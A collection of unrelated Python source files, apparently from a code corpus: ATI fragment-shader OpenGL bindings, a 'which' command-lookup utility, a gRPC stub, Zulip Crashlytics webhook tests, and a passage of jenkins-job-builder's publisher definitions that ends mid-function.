GL_SWIZZLE_STRQ_ATI=_C('GL_SWIZZLE_STRQ_ATI',0x897A)
GL_SWIZZLE_STRQ_DQ_ATI=_C('GL_SWIZZLE_STRQ_DQ_ATI',0x897B)
GL_SWIZZLE_STR_ATI=_C('GL_SWIZZLE_STR_ATI',0x8976)
GL_SWIZZLE_STR_DR_ATI=_C('GL_SWIZZLE_STR_DR_ATI',0x8978)
@_f
@_p.types(None,_cs.GLenum,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint)
def glAlphaFragmentOp1ATI(op,dst,dstMod,arg1,arg1Rep,arg1Mod):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint)
def glAlphaFragmentOp2ATI(op,dst,dstMod,arg1,arg1Rep,arg1Mod,arg2,arg2Rep,arg2Mod):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint)
def glAlphaFragmentOp3ATI(op,dst,dstMod,arg1,arg1Rep,arg1Mod,arg2,arg2Rep,arg2Mod,arg3,arg3Rep,arg3Mod):pass
@_f
@_p.types(None,)
def glBeginFragmentShaderATI():pass
@_f
@_p.types(None,_cs.GLuint)
def glBindFragmentShaderATI(id):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint)
def glColorFragmentOp1ATI(op,dst,dstMask,dstMod,arg1,arg1Rep,arg1Mod):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint)
def glColorFragmentOp2ATI(op,dst,dstMask,dstMod,arg1,arg1Rep,arg1Mod,arg2,arg2Rep,arg2Mod):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint,_cs.GLuint)
def glColorFragmentOp3ATI(op,dst,dstMask,dstMod,arg1,arg1Rep,arg1Mod,arg2,arg2Rep,arg2Mod,arg3,arg3Rep,arg3Mod):pass
@_f
@_p.types(None,_cs.GLuint)
def glDeleteFragmentShaderATI(id):pass
@_f
@_p.types(None,)
def glEndFragmentShaderATI():pass
@_f
@_p.types(_cs.GLuint,_cs.GLuint)
def glGenFragmentShadersATI(range):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLuint,_cs.GLenum)
def glPassTexCoordATI(dst,coord,swizzle):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLuint,_cs.GLenum)
def glSampleMapATI(dst,interp,swizzle):pass
@_f
@_p.types(None,_cs.GLuint,arrays.GLfloatArray)
def glSetFragmentShaderConstantATI(dst,value):pass
|
devananda/python-redfish
|
refs/heads/master
|
examples/__init__.py
|
2
|
__author__ = 'deva'
|
vrjuggler/maestro
|
refs/heads/master
|
maestro/daemon/plugins/services/launch/which.py
|
2
|
#!/usr/bin/env python
# Copyright (c) 2002-2005 ActiveState Corp.
# See LICENSE-which.txt for license details.
# Author:
# Trent Mick ([email protected])
# Home:
# http://trentm.com/projects/which/
r"""Find the full path to commands.
which(command, path=None, verbose=0, exts=None)
Return the full path to the first match of the given command on the
path.
whichall(command, path=None, verbose=0, exts=None)
Return a list of full paths to all matches of the given command on
the path.
whichgen(command, path=None, verbose=0, exts=None)
Return a generator which will yield full paths to all matches of the
given command on the path.
By default the PATH environment variable is searched (as well as, on
Windows, the AppPaths key in the registry), but a specific 'path' list
to search may be specified as well. On Windows, the PATHEXT environment
variable is applied as appropriate.
If "verbose" is true then a tuple of the form
(<fullpath>, <matched-where-description>)
is returned for each match. The latter element is a textual description
of where the match was found. For example:
from PATH element 0
from HKLM\SOFTWARE\...\perl.exe
"""
_cmdlnUsage = """
Show the full path of commands.
Usage:
which [<options>...] [<command-name>...]
Options:
-h, --help Print this help and exit.
-V, --version Print the version info and exit.
-a, --all Print *all* matching paths.
-v, --verbose Print out how matches were located and
show near misses on stderr.
-q, --quiet Just print out matches. I.e., do not print out
near misses.
-p <altpath>, --path=<altpath>
An alternative path (list of directories) may
be specified for searching.
-e <exts>, --exts=<exts>
Specify a list of extensions to consider instead
of the usual list (';'-separate list, Windows
only).
Show the full path to the program that would be run for each given
command name, if any. Which, like GNU's which, returns the number of
failed arguments, or -1 when no <command-name> was given.
Near misses include duplicates, non-regular files and (on Un*x)
files without executable access.
"""
__revision__ = "$Id: which.py 430 2005-08-20 03:11:58Z trentm $"
__version_info__ = (1, 1, 0)
__version__ = '.'.join(map(str, __version_info__))
import os
import sys
import getopt
import stat
#---- exceptions
class WhichError(Exception):
pass
#---- internal support stuff
def _getRegisteredExecutable(exeName):
"""Windows allow application paths to be registered in the registry."""
registered = None
if sys.platform.startswith('win'):
if os.path.splitext(exeName)[1].lower() != '.exe':
exeName += '.exe'
import _winreg
try:
key = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\" +\
exeName
value = _winreg.QueryValue(_winreg.HKEY_LOCAL_MACHINE, key)
registered = (value, "from HKLM\\"+key)
except _winreg.error:
pass
if registered and not os.path.exists(registered[0]):
registered = None
return registered
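# Illustrative note (hypothetical values): for exeName 'perl.exe' this looks up
# HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\perl.exe and, if the
# key exists, returns a tuple such as
#   ('C:\\Perl\\bin\\perl.exe', 'from HKLM\\SOFTWARE\\...\\perl.exe')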
def _samefile(fname1, fname2):
if sys.platform.startswith('win'):
return ( os.path.normpath(os.path.normcase(fname1)) ==\
os.path.normpath(os.path.normcase(fname2)) )
else:
return os.path.samefile(fname1, fname2)
def _cull(potential, matches, verbose=0):
"""Cull inappropriate matches. Possible reasons:
- a duplicate of a previous match
- not a disk file
- not executable (non-Windows)
If 'potential' is approved it is returned and added to 'matches'.
Otherwise, None is returned.
"""
for match in matches: # don't yield duplicates
if _samefile(potential[0], match[0]):
if verbose:
sys.stderr.write("duplicate: %s (%s)\n" % potential)
return None
else:
if not stat.S_ISREG(os.stat(potential[0]).st_mode):
if verbose:
sys.stderr.write("not a regular file: %s (%s)\n" % potential)
elif not os.access(potential[0], os.X_OK):
if verbose:
sys.stderr.write("no executable access: %s (%s)\n"\
% potential)
else:
matches.append(potential)
return potential
#---- module API
def whichgen(command, path=None, verbose=0, exts=None):
"""Return a generator of full paths to the given command.
"command" is a the name of the executable to search for.
"path" is an optional alternate path list to search. The default it
to use the PATH environment variable.
"verbose", if true, will cause a 2-tuple to be returned for each
match. The second element is a textual description of where the
match was found.
"exts" optionally allows one to specify a list of extensions to use
instead of the standard list for this system. This can
effectively be used as an optimization to, for example, avoid
stat's of "foo.vbs" when searching for "foo" and you know it is
not a VisualBasic script but ".vbs" is on PATHEXT. This option
is only supported on Windows.
This method returns a generator which yields either full paths to
the given command or, if verbose, tuples of the form (<path to
command>, <where path found>).
"""
matches = []
if path is None:
usingGivenPath = 0
path = os.environ.get("PATH", "").split(os.pathsep)
if sys.platform.startswith("win"):
path.insert(0, os.curdir) # implied by Windows shell
else:
usingGivenPath = 1
# Windows has the concept of a list of extensions (PATHEXT env var).
if sys.platform.startswith("win"):
if exts is None:
exts = os.environ.get("PATHEXT", "").split(os.pathsep)
# If '.exe' is not in exts then this is Win9x or a bogus
# PATHEXT; fall back to a reasonable default.
for ext in exts:
if ext.lower() == ".exe":
break
else:
exts = ['.COM', '.EXE', '.BAT']
elif not isinstance(exts, list):
raise TypeError("'exts' argument must be a list or None")
else:
if exts is not None:
raise WhichError("'exts' argument is not supported on "\
"platform '%s'" % sys.platform)
exts = []
# File name cannot have path separators because PATH lookup does not
# work that way.
if os.sep in command or os.altsep and os.altsep in command:
pass
else:
for i in range(len(path)):
dirName = path[i]
# On Windows the dirName *could* be quoted, drop the quotes
if sys.platform.startswith("win") and len(dirName) >= 2\
and dirName[0] == '"' and dirName[-1] == '"':
dirName = dirName[1:-1]
for ext in ['']+exts:
absName = os.path.abspath(
os.path.normpath(os.path.join(dirName, command+ext)))
if os.path.isfile(absName):
if usingGivenPath:
fromWhere = "from given path element %d" % i
elif not sys.platform.startswith("win"):
fromWhere = "from PATH element %d" % i
elif i == 0:
fromWhere = "from current directory"
else:
fromWhere = "from PATH element %d" % (i-1)
match = _cull((absName, fromWhere), matches, verbose)
if match:
if verbose:
yield match
else:
yield match[0]
match = _getRegisteredExecutable(command)
if match is not None:
match = _cull(match, matches, verbose)
if match:
if verbose:
yield match
else:
yield match[0]
def which(command, path=None, verbose=0, exts=None):
"""Return the full path to the first match of the given command on
the path.
"command" is a the name of the executable to search for.
"path" is an optional alternate path list to search. The default it
to use the PATH environment variable.
"verbose", if true, will cause a 2-tuple to be returned. The second
element is a textual description of where the match was found.
"exts" optionally allows one to specify a list of extensions to use
instead of the standard list for this system. This can
effectively be used as an optimization to, for example, avoid
stat's of "foo.vbs" when searching for "foo" and you know it is
not a VisualBasic script but ".vbs" is on PATHEXT. This option
is only supported on Windows.
If no match is found for the command, a WhichError is raised.
"""
try:
match = whichgen(command, path, verbose, exts).next()
except StopIteration:
raise WhichError("Could not find '%s' on the path." % command)
return match
def whichall(command, path=None, verbose=0, exts=None):
"""Return a list of full paths to all matches of the given command
on the path.
"command" is a the name of the executable to search for.
"path" is an optional alternate path list to search. The default it
to use the PATH environment variable.
"verbose", if true, will cause a 2-tuple to be returned for each
match. The second element is a textual description of where the
match was found.
"exts" optionally allows one to specify a list of extensions to use
instead of the standard list for this system. This can
effectively be used as an optimization to, for example, avoid
stat's of "foo.vbs" when searching for "foo" and you know it is
not a VisualBasic script but ".vbs" is on PATHEXT. This option
is only supported on Windows.
"""
return list( whichgen(command, path, verbose, exts) )
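# Illustrative usage (a minimal sketch, not part of the original module; it
# assumes this file is importable as 'which' and that 'python' is on PATH):
#
#   import which
#   try:
#       first = which.which("python")          # first match, or WhichError
#   except which.WhichError:
#       first = None
#   every = which.whichall("python")           # list of all matches
#   for p in which.whichgen("python", verbose=1):
#       print p                                # (path, where-found) tuples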
#---- mainline
def main(argv):
all = 0
verbose = 0
altpath = None
exts = None
try:
optlist, args = getopt.getopt(argv[1:], 'haVvqp:e:',
['help', 'all', 'version', 'verbose', 'quiet', 'path=', 'exts='])
except getopt.GetoptError, msg:
sys.stderr.write("which: error: %s. Your invocation was: %s\n"\
% (msg, argv))
sys.stderr.write("Try 'which --help'.\n")
return 1
for opt, optarg in optlist:
if opt in ('-h', '--help'):
print _cmdlnUsage
return 0
elif opt in ('-V', '--version'):
print "which %s" % __version__
return 0
elif opt in ('-a', '--all'):
all = 1
elif opt in ('-v', '--verbose'):
verbose = 1
elif opt in ('-q', '--quiet'):
verbose = 0
elif opt in ('-p', '--path'):
if optarg:
altpath = optarg.split(os.pathsep)
else:
altpath = []
elif opt in ('-e', '--exts'):
if optarg:
exts = optarg.split(os.pathsep)
else:
exts = []
if len(args) == 0:
return -1
failures = 0
for arg in args:
#print "debug: search for %r" % arg
nmatches = 0
for match in whichgen(arg, path=altpath, verbose=verbose, exts=exts):
if verbose:
print "%s (%s)" % match
else:
print match
nmatches += 1
if not all:
break
if not nmatches:
failures += 1
return failures
if __name__ == "__main__":
sys.exit( main(sys.argv) )
|
gurbuzali/hazelcast-jet
|
refs/heads/master
|
extensions/python/src/main/resources/jet_to_python_pb2_grpc.py
|
10
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
import jet_to_python_pb2 as jet__to__python__pb2
class JetToPythonStub(object):
# missing associated documentation comment in .proto file
pass
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.streamingCall = channel.stream_stream(
'/jet_to_python.JetToPython/streamingCall',
request_serializer=jet__to__python__pb2.InputMessage.SerializeToString,
response_deserializer=jet__to__python__pb2.OutputMessage.FromString,
)
class JetToPythonServicer(object):
# missing associated documentation comment in .proto file
pass
def streamingCall(self, request_iterator, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_JetToPythonServicer_to_server(servicer, server):
rpc_method_handlers = {
'streamingCall': grpc.stream_stream_rpc_method_handler(
servicer.streamingCall,
request_deserializer=jet__to__python__pb2.InputMessage.FromString,
response_serializer=jet__to__python__pb2.OutputMessage.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'jet_to_python.JetToPython', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
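# Illustrative wiring (a sketch only, not part of the generated file): a
# concrete servicer would typically be hosted like this, where MyServicer
# (a JetToPythonServicer subclass overriding streamingCall) and the port
# number are hypothetical choices.
#
#   from concurrent import futures
#   server = grpc.server(futures.ThreadPoolExecutor(max_workers=4))
#   add_JetToPythonServicer_to_server(MyServicer(), server)
#   server.add_insecure_port('[::]:50051')
#   server.start()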
|
JPJPJPOPOP/zulip
|
refs/heads/master
|
zerver/webhooks/crashlytics/tests.py
|
31
|
# -*- coding: utf-8 -*-
from zerver.lib.test_classes import WebhookTestCase
class CrashlyticsHookTests(WebhookTestCase):
STREAM_NAME = 'crashlytics'
URL_TEMPLATE = u"/api/v1/external/crashlytics?stream={stream}&api_key={api_key}"
FIXTURE_DIR_NAME = 'crashlytics'
def test_crashlytics_verification_message(self):
# type: () -> None
last_message_before_request = self.get_last_message()
payload = self.get_body('verification')
url = self.build_webhook_url()
result = self.client_post(url, payload, content_type="application/json")
last_message_after_request = self.get_last_message()
self.assert_json_success(result)
self.assertEqual(last_message_after_request.pk, last_message_before_request.pk)
def test_crashlytics_build_in_success_status(self):
# type: () -> None
expected_subject = u"123: Issue Title"
expected_message = u"[Issue](http://crashlytics.com/full/url/to/issue) impacts at least 16 device(s)."
self.send_and_test_stream_message('issue_message', expected_subject, expected_message)
|
joostvdg/jenkins-job-builder
|
refs/heads/master
|
jenkins_jobs/modules/publishers.py
|
1
|
# Copyright 2012 Hewlett-Packard Development Company, L.P.
# Copyright 2012 Varnish Software AS
# Copyright 2013-2014 Antoine "hashar" Musso
# Copyright 2013-2014 Wikimedia Foundation Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Publishers define actions that the Jenkins job should perform after
the build is complete.
**Component**: publishers
:Macro: publisher
:Entry Point: jenkins_jobs.publishers
"""
import logging
import pkg_resources
import random
import sys
import xml.etree.ElementTree as XML
import six
from jenkins_jobs.errors import InvalidAttributeError
from jenkins_jobs.errors import JenkinsJobsException
from jenkins_jobs.errors import MissingAttributeError
import jenkins_jobs.modules.base
from jenkins_jobs.modules import hudson_model
import jenkins_jobs.modules.helpers as helpers
def archive(parser, xml_parent, data):
"""yaml: archive
Archive build artifacts
:arg str artifacts: path specifier for artifacts to archive
:arg str excludes: path specifier for artifacts to exclude (optional)
:arg bool latest-only: only keep the artifacts from the latest
successful build
:arg bool allow-empty: pass the build if no artifacts are
found (default false)
:arg bool only-if-success: archive artifacts only if build is successful
(default false)
:arg bool fingerprint: fingerprint all archived artifacts (default false)
:arg bool default-excludes: Enable or disable the default Ant
exclusions. (default true)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/archive001.yaml
:language: yaml
"""
logger = logging.getLogger("%s:archive" % __name__)
archiver = XML.SubElement(xml_parent, 'hudson.tasks.ArtifactArchiver')
artifacts = XML.SubElement(archiver, 'artifacts')
artifacts.text = data['artifacts']
if 'excludes' in data:
excludes = XML.SubElement(archiver, 'excludes')
excludes.text = data['excludes']
latest = XML.SubElement(archiver, 'latestOnly')
# backward compatibility
latest_only = data.get('latest_only', False)
if 'latest_only' in data:
logger.warn('latest_only is deprecated, please use latest-only')
if 'latest-only' in data:
latest_only = data['latest-only']
if latest_only:
latest.text = 'true'
else:
latest.text = 'false'
if 'allow-empty' in data:
empty = XML.SubElement(archiver, 'allowEmptyArchive')
# Default behavior is to fail the build.
empty.text = str(data.get('allow-empty', False)).lower()
if 'only-if-success' in data:
success = XML.SubElement(archiver, 'onlyIfSuccessful')
success.text = str(data.get('only-if-success', False)).lower()
if 'fingerprint' in data:
fingerprint = XML.SubElement(archiver, 'fingerprint')
fingerprint.text = str(data.get('fingerprint', False)).lower()
default_excludes = XML.SubElement(archiver, 'defaultExcludes')
default_excludes.text = str(data.get('default-excludes', True)).lower()
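# Illustrative input (a hypothetical sketch, not taken from the test
# fixtures): by the time archive() runs, the YAML mapping has been parsed
# into 'data', e.g.
#
#   data = {'artifacts': '**/*.tar.gz',
#           'excludes': '**/*.tmp',
#           'allow-empty': True,
#           'fingerprint': True}
#
# which emits <artifacts>, <excludes>, <allowEmptyArchive> and <fingerprint>
# children (plus the always-present <latestOnly> and <defaultExcludes>)
# under <hudson.tasks.ArtifactArchiver>.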
def blame_upstream(parser, xml_parent, data):
"""yaml: blame-upstream
Notify upstream committers when the build fails
Requires the Jenkins :jenkins-wiki:`Blame Upstream Committers Plugin
<Blame+Upstream+Committers+Plugin>`.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/blame001.yaml
:language: yaml
"""
XML.SubElement(xml_parent,
'hudson.plugins.blame__upstream__commiters.'
'BlameUpstreamCommitersPublisher')
def jclouds(parser, xml_parent, data):
"""yaml: jclouds
JClouds Cloud Storage Settings provides a way to store artifacts on
JClouds supported storage providers. Requires the Jenkins
:jenkins-wiki:`JClouds Plugin <JClouds+Plugin>`.
JClouds Cloud Storage Settings must be configured for the Jenkins instance.
:arg str profile: preconfigured storage profile (required)
:arg str files: files to upload (regex) (required)
:arg str basedir: the source file path (relative to workspace, Optional)
:arg str container: the destination container name (required)
:arg bool hierarchy: keep hierarchy (default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/jclouds001.yaml
"""
deployer = XML.SubElement(xml_parent,
'jenkins.plugins.jclouds.blobstore.'
'BlobStorePublisher')
if 'profile' not in data:
raise JenkinsJobsException('profile parameter is missing')
XML.SubElement(deployer, 'profileName').text = data.get('profile')
entries = XML.SubElement(deployer, 'entries')
deployer_entry = XML.SubElement(entries,
'jenkins.plugins.jclouds.blobstore.'
'BlobStoreEntry')
try:
XML.SubElement(deployer_entry, 'container').text = data['container']
XML.SubElement(deployer_entry, 'path').text = data.get('basedir', '')
XML.SubElement(deployer_entry, 'sourceFile').text = data['files']
except KeyError as e:
raise JenkinsJobsException("blobstore requires '%s' to be set"
% e.args[0])
XML.SubElement(deployer_entry, 'keepHierarchy').text = str(
data.get('hierarchy', False)).lower()
def javadoc(parser, xml_parent, data):
"""yaml: javadoc
Publish Javadoc
Requires the Jenkins :jenkins-wiki:`Javadoc Plugin <Javadoc+Plugin>`.
:arg str directory: Directory relative to the root of the workspace,
such as 'myproject/build/javadoc' (optional)
:arg bool keep-all-successful: When true, it will retain Javadoc for each
successful build. This allows you to browse Javadoc for older builds,
at the expense of additional disk space requirement. If false, it will
only keep the latest Javadoc, so older Javadoc will be overwritten as
new builds succeed. (default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/javadoc001.yaml
:language: yaml
"""
root = XML.SubElement(xml_parent, 'hudson.tasks.JavadocArchiver')
if 'directory' in data:
XML.SubElement(root, 'javadocDir').text = data.get('directory', '')
XML.SubElement(root, 'keepAll').text = str(data.get(
'keep-all-successful', False)).lower()
def jdepend(parser, xml_parent, data):
"""yaml: jdepend
Publish jdepend report
Requires the :jenkins-wiki:`JDepend Plugin <JDepend+Plugin>`.
:arg str file: path to jdepend file (required)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/jdepend001.yaml
:language: yaml
"""
jdepend = XML.SubElement(
xml_parent,
'hudson.plugins.jdepend.JDependRecorder')
filepath = data.get('file', None)
if filepath is None:
raise MissingAttributeError('file')
XML.SubElement(jdepend, 'configuredJDependFile').text = str(filepath)
def hue_light(parser, xml_parent, data):
"""yaml: hue-light
This plugin shows the state of your builds using the awesome Philips hue
lights.
Requires the Jenkins :jenkins-wiki:`hue-light Plugin
<hue-light+Plugin>`.
:arg int light-id: ID of the light. Separate multiple lights with a
comma (required)
:arg string pre-build: Colour of building state (default 'blue')
:arg string good-build: Colour of successful state (default 'green')
:arg string unstable-build: Colour of unstable state (default 'yellow')
:arg string bad-build: Colour of unsuccessful state (default 'red')
Example:
.. literalinclude::
/../../tests/publishers/fixtures/hue-light-minimal.yaml
:language: yaml
.. literalinclude::
/../../tests/publishers/fixtures/hue-light001.yaml
:language: yaml
"""
hue_light = XML.SubElement(
xml_parent, 'org.jenkinsci.plugins.hue__light.LightNotifier')
hue_light.set('plugin', 'hue-light')
if 'light-id' not in data:
raise MissingAttributeError('light-id')
lightId = XML.SubElement(hue_light, 'lightId')
XML.SubElement(lightId, 'string').text = str(data.get(
'light-id', ''))
XML.SubElement(hue_light, 'preBuild').text = data.get(
'pre-build', 'blue')
XML.SubElement(hue_light, 'goodBuild').text = data.get(
'good-build', 'green')
XML.SubElement(hue_light, 'unstableBuild').text = data.get(
'unstable-build', 'yellow')
XML.SubElement(hue_light, 'badBuild').text = data.get(
'bad-build', 'red')
def campfire(parser, xml_parent, data):
"""yaml: campfire
Send build notifications to Campfire rooms.
Requires the Jenkins :jenkins-wiki:`Campfire Plugin <Campfire+Plugin>`.
Campfire notifications global default values must be configured for
the Jenkins instance. Default values will be used if no specific
values are specified for each job, so all config params are optional.
:arg str subdomain: override the default campfire subdomain
:arg str token: override the default API token
:arg bool ssl: override the default 'use SSL'
:arg str room: override the default room name
Example:
.. literalinclude:: /../../tests/publishers/fixtures/campfire001.yaml
:language: yaml
"""
root = XML.SubElement(xml_parent,
'hudson.plugins.campfire.'
'CampfireNotifier')
campfire = XML.SubElement(root, 'campfire')
if ('subdomain' in data and data['subdomain']):
subdomain = XML.SubElement(campfire, 'subdomain')
subdomain.text = data['subdomain']
if ('token' in data and data['token']):
token = XML.SubElement(campfire, 'token')
token.text = data['token']
if ('ssl' in data):
ssl = XML.SubElement(campfire, 'ssl')
ssl.text = str(data['ssl']).lower()
if ('room' in data and data['room']):
room = XML.SubElement(root, 'room')
name = XML.SubElement(room, 'name')
name.text = data['room']
XML.SubElement(room, 'campfire reference="../../campfire"')
def emotional_jenkins(parser, xml_parent, data):
"""yaml: emotional-jenkins
Emotional Jenkins. This funny plugin changes the expression of Mr. Jenkins
in the background when your builds fail.
Requires the Jenkins :jenkins-wiki:`Emotional Jenkins Plugin
<Emotional+Jenkins+Plugin>`.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/emotional-jenkins.yaml
:language: yaml
"""
XML.SubElement(xml_parent,
'org.jenkinsci.plugins.emotional__jenkins.'
'EmotionalJenkinsPublisher')
def trigger_parameterized_builds(parser, xml_parent, data):
"""yaml: trigger-parameterized-builds
Trigger parameterized builds of other jobs.
Requires the Jenkins :jenkins-wiki:`Parameterized Trigger Plugin
<Parameterized+Trigger+Plugin>`.
Use of the `node-label-name` or `node-label` parameters
requires the Jenkins :jenkins-wiki:`NodeLabel Parameter Plugin
<NodeLabel+Parameter+Plugin>`.
Note: 'node-parameters' overrides the Node that the triggered
project is tied to.
:arg list project: list the jobs to trigger, will generate comma-separated
string containing the named jobs.
:arg str predefined-parameters: parameters to pass to the other
job (optional)
:arg bool current-parameters: Whether to include the parameters passed
to the current build to the triggered job (optional)
:arg bool node-parameters: Use the same Node for the triggered builds
that was used for this build. (optional)
:arg bool svn-revision: Pass svn revision to the triggered job (optional)
:arg bool include-upstream: Include/pass through Upstream SVN Revisions.
Only valid when 'svn-revision' is true. (default false)
:arg dict git-revision: Passes git revision to the triggered job
(optional).
* **combine-queued-commits** (bool): Whether to combine queued git
hashes or not (default false)
:arg bool combine-queued-commits: Combine Queued git hashes. Only valid
when 'git-revision' is true. (default false)
.. deprecated:: 1.5.0 Please use `combine-queued-commits` under the
`git-revision` argument instead.
:arg dict boolean-parameters: Pass boolean parameters to the downstream
jobs. Specify the name and boolean value mapping of the parameters.
(optional)
:arg str condition: when to trigger the other job. Can be: 'SUCCESS',
'UNSTABLE', 'FAILED_OR_BETTER', 'UNSTABLE_OR_BETTER',
'UNSTABLE_OR_WORSE', 'FAILED', 'ALWAYS'. (default 'ALWAYS')
:arg str property-file: Use properties from file (optional)
:arg bool fail-on-missing: Blocks the triggering of the downstream jobs
if any of the property files are not found in the workspace.
Only valid when 'property-file' is specified.
(default 'False')
:arg bool use-matrix-child-files: Use files in workspaces of child
builds (default 'False')
:arg str matrix-child-combination-filter: A Groovy expression to filter
the child builds to look in for files
:arg bool only-exact-matrix-child-runs: Use only child builds triggered
exactly by the parent.
:arg str file-encoding: Encoding of contents of the files. If not
specified, default encoding of the platform is used. Only valid when
'property-file' is specified. (optional)
:arg bool trigger-with-no-params: Trigger a build even when there are
currently no parameters defined (default 'False')
:arg str restrict-matrix-project: Filter that restricts the subset
of the combinations that the downstream project will run (optional)
:arg str node-label-name: Specify the Name for the NodeLabel parameter.
(optional)
:arg str node-label: Specify the Node for the NodeLabel parameter.
(optional)
Example:
.. literalinclude::
/../../tests/publishers/fixtures/trigger_parameterized_builds001.yaml
:language: yaml
.. literalinclude::
/../../tests/publishers/fixtures/trigger_parameterized_builds003.yaml
:language: yaml
"""
logger = logging.getLogger("%s:trigger-parameterized-builds" % __name__)
pt_prefix = 'hudson.plugins.parameterizedtrigger.'
tbuilder = XML.SubElement(xml_parent, pt_prefix + 'BuildTrigger')
configs = XML.SubElement(tbuilder, 'configs')
# original order
orig_order = [
'predefined-parameters',
'git-revision',
'property-file',
'current-parameters',
'node-parameters',
'svn-revision',
'restrict-matrix-project',
'node-label-name',
'node-label',
'boolean-parameters',
]
try:
if parser.jjb_config.config_parser.getboolean('__future__',
'param_order_from_yaml'):
orig_order = None
except six.moves.configparser.NoSectionError:
pass
if orig_order:
logger.warn(
"Using deprecated order for parameter sets in "
"triggered-parameterized-builds. This will be changed in a future "
"release to inherit the order from the user defined yaml. To "
"enable this behaviour immediately, set the config option "
"'__future__.param_order_from_yaml' to 'true' and change the "
"input job configuration to use the desired order")
for project_def in data:
tconfig = XML.SubElement(configs, pt_prefix + 'BuildTriggerConfig')
tconfigs = XML.SubElement(tconfig, 'configs')
if orig_order:
parameters = orig_order
else:
parameters = project_def.keys()
for param_type in parameters:
param_value = project_def.get(param_type)
if param_value is None:
continue
if param_type == 'predefined-parameters':
params = XML.SubElement(tconfigs, pt_prefix +
'PredefinedBuildParameters')
properties = XML.SubElement(params, 'properties')
properties.text = param_value
elif param_type == 'git-revision' and param_value:
if 'combine-queued-commits' in project_def:
logger.warn(
"'combine-queued-commit' has moved to reside under "
"'git-revision' configuration, please update your "
"configs as support for this will be removed."
)
git_revision = {
'combine-queued-commits':
project_def['combine-queued-commits']
}
else:
git_revision = project_def['git-revision']
helpers.append_git_revision_config(tconfigs, git_revision)
elif param_type == 'property-file':
params = XML.SubElement(tconfigs,
pt_prefix + 'FileBuildParameters')
properties = XML.SubElement(params, 'propertiesFile')
properties.text = project_def['property-file']
failOnMissing = XML.SubElement(params, 'failTriggerOnMissing')
failOnMissing.text = str(project_def.get('fail-on-missing',
False)).lower()
if 'file-encoding' in project_def:
XML.SubElement(params, 'encoding'
).text = project_def['file-encoding']
if 'use-matrix-child-files' in project_def:
# TODO: These parameters only affect execution in
# publishers of matrix projects; we should warn if they are
# used in other contexts.
XML.SubElement(params, "useMatrixChild").text = (
str(project_def['use-matrix-child-files']).lower())
XML.SubElement(params, "combinationFilter").text = (
project_def.get('matrix-child-combination-filter', ''))
XML.SubElement(params, "onlyExactRuns").text = (
str(project_def.get('only-exact-matrix-child-runs',
False)).lower())
elif param_type == 'current-parameters' and param_value:
XML.SubElement(tconfigs, pt_prefix + 'CurrentBuildParameters')
elif param_type == 'node-parameters' and param_value:
XML.SubElement(tconfigs, pt_prefix + 'NodeParameters')
elif param_type == 'svn-revision' and param_value:
param = XML.SubElement(tconfigs, pt_prefix +
'SubversionRevisionBuildParameters')
XML.SubElement(param, 'includeUpstreamParameters').text = str(
project_def.get('include-upstream', False)).lower()
elif param_type == 'restrict-matrix-project' and param_value:
subset = XML.SubElement(tconfigs, pt_prefix +
'matrix.MatrixSubsetBuildParameters')
XML.SubElement(subset, 'filter').text = \
project_def['restrict-matrix-project']
elif (param_type == 'node-label-name' or
param_type == 'node-label'):
tag_name = ('org.jvnet.jenkins.plugins.nodelabelparameter.'
'parameterizedtrigger.NodeLabelBuildParameter')
if tconfigs.find(tag_name) is not None:
# already processed and can only have one
continue
params = XML.SubElement(tconfigs, tag_name)
name = XML.SubElement(params, 'name')
if 'node-label-name' in project_def:
name.text = project_def['node-label-name']
label = XML.SubElement(params, 'nodeLabel')
if 'node-label' in project_def:
label.text = project_def['node-label']
elif param_type == 'boolean-parameters' and param_value:
params = XML.SubElement(tconfigs,
pt_prefix + 'BooleanParameters')
config_tag = XML.SubElement(params, 'configs')
param_tag_text = pt_prefix + 'BooleanParameterConfig'
params_list = param_value
for name, value in params_list.items():
param_tag = XML.SubElement(config_tag, param_tag_text)
XML.SubElement(param_tag, 'name').text = name
XML.SubElement(param_tag, 'value').text = str(
value or False).lower()
if not list(tconfigs):
# no child parameter tags were added
